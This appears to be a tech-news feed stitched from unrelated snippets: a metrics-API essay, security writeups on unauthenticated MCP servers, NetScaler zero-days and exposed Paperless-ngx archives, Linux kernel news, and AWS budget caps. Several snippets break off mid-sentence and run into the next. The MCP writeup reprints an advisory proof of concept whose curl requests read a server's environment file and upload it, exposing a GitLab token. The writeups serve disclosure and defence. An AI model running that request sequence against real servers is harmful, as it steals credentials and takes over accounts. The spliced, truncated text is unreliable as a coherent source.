A small SaaS should choose a hosted metrics dashboard API by testing whether it can preserve four incident signals across a rollback: request outcomes, latency, queue age, and deployment identity. The cheapest-looking chart is irrelevant if a reverted release changes labels, duplicates counters, or erases the boundary between the faulty version and the recovery. Start with the retention bill, keep the evidence needed to reconstruct a customer-support incident, and treat charts and alerts as replaceable views over that evidence. Short answer: send bounded, versioned metrics from the application, retain enough regional and deployment context to compare US and EU behavior, and evaluate any hosted service through export, replay, and rollback drills. Do not let the dashboard become the only audit trail. For custom application metrics, the dominant term is usually not the number of attractive charts. It is the number of time series retained over time: every metric name combined with every distinct label set produces another series. A support endpoint labeled by region, operation, outcome, and release stays bounded; adding customer_id, ticket_id, or raw error text makes its cardinality track business activity and defeats a predictable retention plan. Put numbers on the design before choosing an API. Consider an explicit planning model, not a benchmark: 4 signals, 2 regions, 6 operations, 3 outcomes, and 2 simultaneously relevant releases produce at most 288 active combinations. A customer identifier with 10,000 possible values would multiply the model into millions of combinations. The exact storage charge depends on the service, aggregation, scrape or push interval, and retention policy, but the architectural result does not: bounded dimensions are suitable for metrics; incident-specific identity belongs in a durable event record. For a small Node.js SaaS backed by Postgres, the runtime and database do not change that arithmetic; they change where the durable event can be
Between Monday morning and Tuesday night this week, four Model Context Protocol servers published CVE records for the same basic failure: every tool they expose is reachable with no authentication. A GitLab server that reads any file on its host and uploads it wherever the request asks. A gateway that runs a program chosen by whoever can POST to it. A MySQL tool that hands its database and filesystem to the network. And an IBM sandbox whose escape comes down to two string concatenations. NVD published all four records in roughly 35 hours. I write about MCP security most weeks. On Tuesday I published a plain-language primer on the attack classes (What Is MCP Security? Common Attacks and How to Scan Your MCP Servers), and my working theory has been that the protocol's real risk lives in defaults, not in exotic prompt injection. This week read like a validation set. I pulled all four NVD records, the GitHub advisories, and the fix commits this morning, and as of publish time I found zero writeups on Hacker News or Dev.to for any of the four. A fifth record belongs in this story: LiteLLM's MCP authentication bypass has been on CISA's KEV list since September 2 and is, per CISA's coordinator scoring, under active exploitation. Here is the first one, in the advisory's own request shape: # From GHSA-cv3r-c5h8-f4g5 (CVE-2026-61560), request shape simplified from the # advisory's own PoC. Run against hosts you own only. # 1. Connect to the SSE endpoint and capture a session id. No auth required. curl -N http://target:3002/sse # 2. Ask the server to read any local file and upload it into a GitLab project. curl -X POST "http://target:3002/messages?sessionId= " \ -d '{"tool": "upload_markdown", "args": {"file_path": "/proc/self/environ"}}' # 3. Retrieve the upload from the GitLab project. The environment file contains # GITLAB_PERSONAL_ACCESS_TOKEN, which is the whole GitLab account. No login screen. No exploit code I had to write. The file read is a feature the tool advertises
[ internet ] ──► ┌──────────────────────┐ ──► [ your VPN users ] │ NetScaler ADC / GW │ │ CVE-2026-88771 9.5 │ unauthenticated │ CVE-2026-88772 9.5 │ remote code execution └──────────────────────┘ Two zero-day remote code execution bugs in Citrix NetScaler ADC and NetScaler Gateway were confirmed actively exploited before any patch existed, and the first public warnings came from a Reddit thread, not the vendor. Citrix shipped fixes on September 27, but there is a detail buried in the advisory that most teams will miss: if you patched last month for the authentication bypass, your current build is still vulnerable to both of these. I was following the watchTowr thread on X when this broke, and cross-checked it against Citrix's advisory, the Tenable FAQ, and the r/Citrix threads before writing this. Everything below comes from those primary sources. One honesty note: I do not run a NetScaler fleet myself, so treat this as a triage plan built from public records, not field experience. Adapt the paths and endpoints to your environment. CVE-2026-88771 is improper input validation leading to unauthenticated arbitrary command execution. Citrix says it affects all deployments in the affected version range, with no extra feature needed to be enabled. That makes it the scarier of the two: if your appliance is in the range, the precondition is just reachability. CVE-2026-88772 is a memory overflow that can end in remote code execution or denial of service, and it requires DTLS to be enabled. That is the trap: DTLS is on by default for NetScaler Gateway VPN virtual servers unless someone explicitly turned it off. A "we don't use that feature" assumption does not protect a default install. Both score 9.5. Neither is related to the August authentication bypass pair, CVE-2026-19490 and CVE-2026-19489. Because the builds that fixed the last round of flaws are inside the affected range for this round. If you are on 14.1-73.32 or 13.1-63.21, the builds released August 19 for CVE-202
6,918 Paperless matches: a document archive that was meant to replace the filing cabinet Paperless-ngx scans paper documents, runs optical character recognition over them, and stores the result as searchable files. Teams adopt it to stop losing invoices and contracts, which means the archive ends up holding exactly the records a company must protect. all scope. Some of those matches are unrelated projects that share the word, so the Paperless-ngx share of the total is smaller. A document archive is an identity record in disguise. Invoices carry bank details and addresses. Contracts name signatories. Employment paperwork includes national identifiers. Once scanned and indexed, all of it becomes searchable text with a single query box in front of it. Self-hosted deployments usually authenticate against a local user table, and many rely on a reverse proxy for TLS. The frequent mistakes are familiar. Accounts are created for family members or temporary staff and never removed. The archive sits on a public hostname because remote access was convenient. Backups are written to the same volume, so a compromise takes the copies too. Establish whether the archive must be reachable without a VPN. For most households and small teams the answer is no, and closing the port removes the risk entirely. The count is a starting point for scoping; an operator can restrict the query to their own address space and verify that nothing answers unexpectedly. The link reproduces the query used here. Paperless-ngx documentation: https://docs.paperless-ngx.com/ ZoomEye search, query title="Paperless", scope all, retrieved 2026-10-03, count 6,918
Arm sent out an initial set of patches this week working on support in the Linux kernel for TLBI Domains. This "TLBID" feature is an upcoming Arm architecture capability designed to increase performance on high core count systems...
Here's a product feature which the world is going to need a whole lot more of over the coming months and years: default hard budget caps . I'm talking about the feature of pay-by-usage services and APIs that lets you say "after $X/month, cut this thing off and return errors". These need to be hard limits. Soft caps, "after $X/month, send me a warning email", will not cut it. Coding agents, and personal agents (coding agents wrapped in a less threatening UI), greatly reduce the friction of spinning up code that can do useful things. Sometimes those things cost money - calls to paid APIs, or hosted web applications, or systems that can bill for additional storage and compute. Nobody wants to wake up to an email sent at midnight warning about a budget limit and find that, while they slept, their rogue service had consumed several hundred (or several thousand) more dollars of usage. An argument against this is that businesses don't want their hosted applications to start throwing errors because some budget was exceeded. I expect that most businesses and individuals would prefer errors to a surprise $10,000+ bill. I think hard budget caps need to be the default. If someone wants to live dangerously they should be able to do that, but it needs to be on an opt-in basis. Have a nice, clear checkbox somewhere prominent: Remove the budget cap. My application will not be shut down if I exceed the configured budget limit, and I will be responsible for subsequent charges. The service I most want to see this from is AWS. I've heard plenty of stories from people who refuse to use AWS for personal projects out of (justified) fear that a runaway service might bankrupt them. I've also heard stories from people who didn't anticipate this and ended up seriously burned. ... and it turns out AWS finally launched spending limits a few weeks ago! From their announcement New AWS experience helps builders get started and ship faster on 16th September: When you're ready to upgrade to a paid p
Over the past year Timur Kristóf of Valve's Linux graphics driver team has made multiple very nice improvements to the AMDGPU kernel driver for enhancing support for old (GCN 1.0/1.1 era from a decade ago) graphics cards so that they can better handle Linux gaming and other tasks. This week in Toronto, Kristóf presented on this AMDGPU work that he initially began as a kernel driver development exercise after initially spending years in user-space focused on the Mesa 3D driver code...
Linaro engineer Vincent Guittot sent out a set of patches on Friday working on scheduling latency improvements, especially when multiple short slice tasks are running concurrently on the same system...
Greg Kroah-Hartman has announced the release of the 7.2.9, 6.18.55, 6.12.112, 6.6.158, 6.1.189, 5.15.222, and 5.10.271 stable kernels. Each contains a large number of important fixes throughout the tree; users are advised to upgrade.
We are nearing the cut-off of new feature material being accepted to DRM-Next ahead of the Linux 7.4 merge window. But this week another round of DRM-Misc changes made it, which included some new hardware support and other last minute items...
Asahi Linux developer Sven Peter today sent out the pull requests of the Apple SoC Device Tree changes they are ready to upstream for the Linux 7.4 merge window happening later this month. Most notable is the initial Device Tree for Apple systems using the base M4 SoC model as well as for the MacBook Neo with the A18 Pro SoC...
Ubuntu developer Gianpiero Carpinelli at Canonical has been working on introducing SHA3-256 and SHA3-384 support for Debian's APT packaging tool in preparing for if/when that SHA2 is broken...
Another day, another company declaring that the current memory crisis driving RAM prices through the roof is far from over. This time it's Micron, one of three firms - Samsung and SK Hynix are the others - which have been accused of worsening the RAM crisis via price fixing by a US lawsuit. Read more
The Linux Test Project has announced its latest stable release for September 2026. There have been 382 patches from 41 authors since the May 2026 release. See the announcement for a list of new tests, changes, and more.
The newest systemd component being worked on and drafted for an initial pull request is systemd-appd as a new mechanism to centralizing the tracking of user's apps...
Dell has patched two maximum severity vulnerabilities in the Container Storage Modules (CSM) that connect Dell enterprise storage arrays to Kubernetes environments. [...]
The company announced it has stopped using secret agreements with county officials and acknowledged that community backlash is leading to data center moratoriums across the country.
Apex Compute is the company started in California in 2024 that aims to produce high-efficiency AI accelerators for real-time edge AI inferencing. So far they have an FPGA prototype for licensing and deployment and carries the bold claim of being "20x faster than the NVIDIA Jetson" and at under 10W and one fifth the cost. Making Apex Compute much more interesting to us now is that they are developing an open-source, Mesa-based Vulkan driver for their hardware...
Coreboot 26.09 released yesterday as the latest quarterly feature release to this open-source software for replacing proprietary BIOS and system firmware on a growing selection of devices...
During the past month on Phoronix were 284 original news articles and another 19 featured Linux hardware reviews/multi-page benchmark articles. A lot of exciting happenings both on the hardware and software fronts while October is sure to be another interesting month with the releases of Ubuntu 26.10, Fedora 45, and some more hardware fun...
With the vast array of wired and wireless networking drivers within the Linux kernel and range of protocols and other networking features, it's a big expanse of code for AI/LLM agents to analyze and critique. The Linux networking developers have acknowledged being "complete overwhelmed" by the AI/LLM-driven patch activity and bug reports as well as battling against AI slop patches. Even though Linux 7.3 stable won't be out for another three weeks, some networking fixes are already being diverted to the next kernel version...
By now it is no secret that large language models (LLMs) have made it easy for people to identify security bugs, and that has resulted in a flood of bug reports to almost every free-software project, including the kernel. At the 2026 edition of Kernel Recipes, Greg Kroah-Hartman took the stage to talk about how the kernel's security team is handling this deluge. His core message was "don't panic".
In addition to the very nice AMDGPU IOMMU optimization for iGPUs set to debut in the Linux 7.4 kernel, over on the AMD EPYC server side for servers running SEV-SNP virtual machines is a separate, nice optimization also expected for this next kernel version...
Longtime ARM Linux maintainer Arnd Bergmann over the past year has been working to clear out a number of old ARM platforms from the mainline kernel tree. With Linux 7.3 many older 32-bit ARM platforms were deprecated and in turn hundreds of kernel drivers orphaned. Now it's on to removing that actual code, which given the amount of entangled code, is itself a challenge...
Earlier this year Intel announced the "Optimization Zone" as their new initiative to provide a centralized place to collect all their resources for maximizing performance and software tuning on Intel hardware platforms. They've continued building out more resources for the Intel Optimization Zone and yesterday released v1.2 with more tuning guides and best practices for optimal performance on Intel hardware...
You update a Deployment, run kubectl rollout status, and wait. The command times out. But when you send a request to the Service, it still answers. So did the update finish? And if it didn't, which Po
Inside this week's LWN.net Weekly Edition: Front: PostgreSQL and the kernel; Rust on the GPU; KDE Plasma; C and memory safety; Rust radio; KDE funding; Chromium development. Briefs: File-notification attacks; Kernel report; TAB election; F-Droid 2.0; Firefox 157.0; GDB 18.1; Git v2.56.0; Quotes; ... Announcements: Newsletters, conferences, security updates, patches, and more.
Update, September 30, 7:37 p.m. ET: Apple says all of the outages have now been resolved, with the exception of Apple TV. Update, October 1, 8:00 p.m. ET: Apple says the Apple TV issue has finally been resolved. Apple is currently reporting issues affecting Apple TV and subscription purchases, while some users are also running into problems elsewhere across the company’s services. Here are the details. more…
My comment on S3 Is the Future, S3 Is the Past — Hacker News. One thing I find notable about S3 today is that, while it used to drop in price reasonably often, there hasn't been a price drop in a full decade : 2006-03-14 $0.150/GB-month 2010-11-01 $0.140/GB-month 2012-02-01 $0.125/GB-month 2012-12-01 $0.095/GB-month 2014-02-01 $0.085/GB-month 2014-04-01 $0.030/GB-month 2016-12-01 $0.023/GB-month Today it's still $0.023/GB-month. Tags: amazon-web-services , s3
My comment on We just shipped support for the ugliest part of HTTP: Vary — Hacker News. I've been wanting this from Cloudflare for years . The classic problem here is if you do that thing where user agents that send "accept: text/html" get HTML, while user agents that don't get JSON or some other format. This used to be impossible to deploy behind Cloudflare caching, because they ignored the Vary header on anything other than images - so you risked caching the JSON version and then serving it up to someone who was expecting HTML. (Independent of the Cloudflare feature I ended up deciding never to use that pattern, because I prefer having URL that predictably returns HTML or JSON - I add a .json suffix to my apps to serve JSON instead.) Tags: http , cloudflare